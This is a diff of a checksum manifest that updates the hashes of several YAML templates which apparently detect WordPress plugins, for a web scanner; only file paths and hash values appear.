+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
